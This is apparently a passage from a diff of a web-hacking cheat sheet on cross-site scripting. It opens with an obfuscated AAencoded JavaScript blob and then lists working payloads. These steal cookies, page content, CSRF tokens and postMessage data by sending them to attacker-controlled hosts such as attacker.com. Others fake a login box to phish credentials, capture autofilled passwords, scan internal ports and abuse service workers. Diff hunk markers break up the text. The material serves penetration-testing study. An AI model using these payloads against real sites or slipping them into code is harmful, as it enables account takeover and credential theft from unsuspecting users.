゚ω゚ノ= /`m´)ノ ~┻━┻ //*´∇`*/ ['_']; o=(゚ー゚) =_=3; c=(゚Θ゚) =(゚ー゚)-(゚ー゚); (゚Д゚) =(゚Θ゚)= (o^_^o)/ (o^_^o);(゚Д゚)={゚Θ゚: '_' ,゚ω゚ノ : ((゚ω゚ノ==3) +'_') [゚Θ゚] ,゚ー゚ノ :(゚ω゚ノ+ '_')[o^_^o -(゚Θ゚)] ,゚Д゚ノ:((゚ー゚==3) +'_')[゚ー゚] }; (゚Д゚) [゚Θ゚] =((゚ω゚ノ==3) +'_') [c^_^o];(゚Д゚) ['c'] = ((゚Д゚)+'_') [ (゚ー゚)+(゚ー゚)-(゚Θ゚) ];(゚Д゚) ['o'] = ((゚Д゚)+'_') [゚Θ゚];(゚o゚)=(゚Д゚) ['c']+(゚Д゚) ['o']+(゚ω゚ノ +'_')[゚Θ゚]+ ((゚ω゚ノ==3) +'_') [゚ー゚] + ((゚Д゚) +'_') [(゚ー゚)+(゚ー゚)]+ ((゚ー゚==3) +'_') [゚Θ゚]+((゚ー゚==3) +'_') [(゚ー゚) - (゚Θ゚)]+(゚Д゚) ['c']+((゚Д゚)+'_') [(゚ー゚)+(゚ー゚)]+ (゚Д゚) ['o']+((゚ー゚==3) +'_') [゚Θ゚];(゚Д゚) ['_'] =(o^_^o) [゚o゚] [゚o゚];(゚ε゚)=((゚ー゚==3) +'_') [゚Θ゚]+ (゚Д゚) .゚Д゚ノ+((゚Д゚)+'_') [(゚ー゚) + (゚ー゚)]+((゚ー゚==3) +'_') [o^_^o -゚Θ゚]+((゚ー゚==3) +'_') [゚Θ゚]+ (゚ω゚ノ +'_') [゚Θ゚]; (゚ー゚)+=(゚Θ゚); (゚Д゚)[゚ε゚]='\\'; (゚Д゚).゚Θ゚ノ=(゚Д゚+ ゚ー゚)[o^_^o -(゚Θ゚)];(o゚ー゚o)=(゚ω゚ノ +'_')[c^_^o];(゚Д゚) [゚o゚]='\"';(゚Д゚) ['_'] ( (゚Д゚) ['_'] (゚ε゚+(゚Д゚)[゚o゚]+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ (゚Θ゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ (゚ー゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ ((゚ー゚) + (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) +(o^_^o))+ ((o^_^o) - (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) +(o^_^o))+ (゚ー゚)+ (゚Д゚)[゚ε゚]+((゚ー゚) + (゚Θ゚))+ (c^_^o)+ (゚Д゚)[゚ε゚]+(゚ー゚)+ ((o^_^o) - (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚Θ゚)+ (c^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ ((゚ー゚) + (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ (゚ー゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ (゚ー゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ ((゚ー゚) + (o^_^o))+ (゚Д゚)[゚ε゚]+((゚ー゚) + (゚Θ゚))+ (゚ー゚)+ (゚Д゚)[゚ε゚]+(゚ー゚)+ (c^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚Θ゚)+ ((o^_^o) - (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ (゚Θ゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) +(o^_^o))+ ((o^_^o) +(o^_^o))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ (゚Θ゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) - (゚Θ゚))+ (o^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ (o^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) +(o^_^o))+ ((o^_^o) - (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ (゚Θ゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) +(o^_^o))+ (c^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) +(o^_^o))+ (゚ー゚)+ (゚Д゚)[゚ε゚]+(゚ー゚)+ ((o^_^o) - (゚Θ゚))+ (゚Д゚)[゚ε゚]+((゚ー゚) + (゚Θ゚))+ (゚Θ゚)+ (゚Д゚)[゚o゚]) (゚Θ゚)) ('_');
```
### XSS common payloads
# XSS common payloads
#### Several payloads in 1
## Several payloads in 1
{% content-ref url="steal-info-js.md" %}
[steal-info-js.md](steal-info-js.md)
{% endcontent-ref %}
#### Retrieve Cookies
## Retrieve Cookies
```javascript
<img src=x onerror=this.src="http://<YOUR_SERVER_IP>/?c="+document.cookie>
@ -755,7 +754,7 @@ Past known protocols: `mailto://`, `//x:1/`, `ws://`, `wss://`, _empty Location
You **won't be able to access the cookies from JavaScript** if the HTTPOnly flag is set in the cookie. But here you have [some ways to bypass this protection](../hacking-with-cookies/#httponly) if you are lucky enough.
{% endhint %}
#### Steal Page Content
## Steal Page Content
```javascript
var url = "http://10.10.10.25:8000/vac/a1fbf2d1-7c3f-48d2-b0c3-a205e54e09e8";
@ -770,7 +769,7 @@ xhr.open('GET', url, true);
xhr.send(null);
```
#### Find internal IPs
## Find internal IPs
```html
<script>
@ -818,13 +817,13 @@ function fetchUrl(url, wait){
</script>
```
#### Port Scanner (fetch)
## Port Scanner (fetch)
```javascript
const checkPort = (port) => { fetch(http://localhost:${port}, { mode: "no-cors" }).then(() => { let img = document.createElement("img"); img.src = http://attacker.com/ping?port=${port}; }); } for(let i=0; i<1000; i++) { checkPort(i); }
```
#### Port Scanner (websockets)
## Port Scanner (websockets)
```python
var ports = [80, 443, 445, 554, 3306, 3690, 1234];
@ -845,13 +844,13 @@ _Short times indicate a responding port_ _Longer times indicate no response._
Review the list of ports banned in Chrome [**here**](https://src.chromium.org/viewvc/chrome/trunk/src/net/base/net\_util.cc) and in Firefox [**here**](https://www-archive.mozilla.org/projects/netlib/portbanning#portlist).
#### Box to ask for credentials
## Box to ask for credentials
```markup
<style>::placeholder { color:white; }</style><script>document.write("<div style='position:absolute;top:100px;left:250px;width:400px;background-color:white;height:230px;padding:15px;border-radius:10px;color:black'><form action='https://example.com/'><p>Your sesion has timed out, please login again:</p><input style='width:100%;' type='text' placeholder='Username' /><input style='width: 100%' type='password' placeholder='Password'/><input type='submit' value='Login'></form><p><i>This login box is presented using XSS as a proof-of-concept</i></p></div>")</script>
```
#### Auto-fill passwords capture
## Auto-fill passwords capture
```javascript
<b>Username:</><br>
@ -866,7 +865,7 @@ body:username.value+':'+this.value
When any data is introduced in the password field, the username and password is sent to the attackers server, even if the client selects a saved password and don't write anything the credentials will be ex-filtrated.
#### Keylogger
## Keylogger
Just searching in github I found a few different ones:
@ -875,7 +874,7 @@ Just searching in github I found a few different ones:
* [https://github.com/hakanonymos/JavascriptKeylogger](https://github.com/hakanonymos/JavascriptKeylogger)
* You can also use metasploit `http_javascript_keylogger`
#### XSS - Stealing CSRF tokens
## XSS - Stealing CSRF tokens
```javascript
<script>
@ -892,7 +891,7 @@ function handleResponse() {
</script>
```
#### XSS - Stealing PostMessage messages
## XSS - Stealing PostMessage messages
```markup
<img src="https://attacker.com/?" id=message>
@ -902,7 +901,7 @@ function handleResponse() {
</script>
```
#### XSS - Abusing Service Workers
## XSS - Abusing Service Workers
A service worker is a **script** that your browser **runs** in the **background**, separate from a web page, opening the door to features that don't need a web page or user interaction. ([More info about what is a service worker here](https://developers.google.com/web/fundamentals/primers/service-workers)).\
The goal of this attack is to **create service workers** on the **victim session** inside the **vulnerable** web **domain** that grant the **attacker control** over **all the pages** the **victim** will load in **that domain**.
@ -955,11 +954,11 @@ There is **C2** dedicated to the **exploitation of Service Workers** called [**S
In an XSS situation, the 24 hour cache directive limit ensures that a malicious or compromised SW will outlive a fix to the XSS vulnerability by a maximum of 24 hours (assuming the client is online). Site operators can shrink the window of vulnerability by setting lower TTLs on SW scripts. We also encourage developers to [build a kill-switch SW](https://stackoverflow.com/questions/33986976/how-can-i-remove-a-buggy-service-worker-or-implement-a-kill-switch/38980776#38980776).
#### Polyglots
## Polyglots
{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/xss_polyglots.txt" %}
#### Blind XSS payloads
## Blind XSS payloads
You can also use: [https://xsshunter.com/](https://xsshunter.com)
@ -1003,17 +1002,17 @@ You can also use: [https://xsshunter.com/](https://xsshunter.com)
<div ng-app ng-csp><textarea autofocus ng-focus="d=$event.view.document;d.location.hash.match('x1') ? '' : d.location='//localhost/mH/'"></textarea></div>
```
#### Brute-Force List
## Brute-Force List
{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/xss.txt" %}
### XSS Abusing other vulnerabilities
# XSS Abusing other vulnerabilities
#### XSS in Markdown
## XSS in Markdown
Check [https://github.com/cujanovic/Markdown-XSS-Payloads/blob/master/Markdown-XSS-Payloads.txt](https://github.com/cujanovic/Markdown-XSS-Payloads/blob/master/Markdown-XSS-Payloads.txt) to find possible payloads
#### XSS to SSRF
## XSS to SSRF
Got XSS on a **site that uses caching**? Try **upgrading that to SSRF** through Edge Side Include Injection with this payload:
@ -1024,7 +1023,7 @@ Got XSS on a **site that uses caching**? Try **upgrading that to SSRF** through
Use it to bypass cookie restrictions, XSS filters and much more!\
More information about this technique here: [**XSLT**](../xslt-server-side-injection-extensible-stylesheet-languaje-transformations.md).
#### XSS in dynamic created PDF
## XSS in dynamic created PDF
If a web page is creating a PDF using user controlled input, you can try to **trick the bot** that is creating the PDF into **executing arbitrary JS code**.\
So, if the **PDF creator bot finds** some kind of **HTML** **tags**, it is going to **interpret** them, and you can **abuse** this behaviour to cause a **Server XSS**.
@ -1039,7 +1038,7 @@ If you cannot inject HTML tags it could be worth it to try to **inject PDF data*
[pdf-injection.md](pdf-injection.md)
{% endcontent-ref %}
#### XSS uploading files (svg)
## XSS uploading files (svg)
Upload as an image a file like the following one (from [http://ghostlulz.com/xss-svg/](http://ghostlulz.com/xss-svg/)):
@ -1093,13 +1092,13 @@ alert("XSS");
Find m**ore SVG payloads in** [**https://github.com/allanlw/svg-cheatsheet**](https://github.com/allanlw/svg-cheatsheet)\*\*\*\*
### XSS resources
# XSS resources
[https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20injection)\
[http://www.xss-payloads.com](http://www.xss-payloads.com) [https://github.com/Pgaijin66/XSS-Payloads/blob/master/payload.txt](https://github.com/Pgaijin66/XSS-Payloads/blob/master/payload.txt) [https://github.com/materaj/xss-list](https://github.com/materaj/xss-list) [https://github.com/ismailtasdelen/xss-payload-list](https://github.com/ismailtasdelen/xss-payload-list) [https://gist.github.com/rvrsh3ll/09a8b933291f9f98e8ec](https://gist.github.com/rvrsh3ll/09a8b933291f9f98e8ec)\
[https://netsec.expert/2020/02/01/xss-in-2020.html](https://netsec.expert/2020/02/01/xss-in-2020.html)
#### XSS TOOLS
## XSS TOOLS
Find some [**tools for XSS here**](xss-tools.md)**.**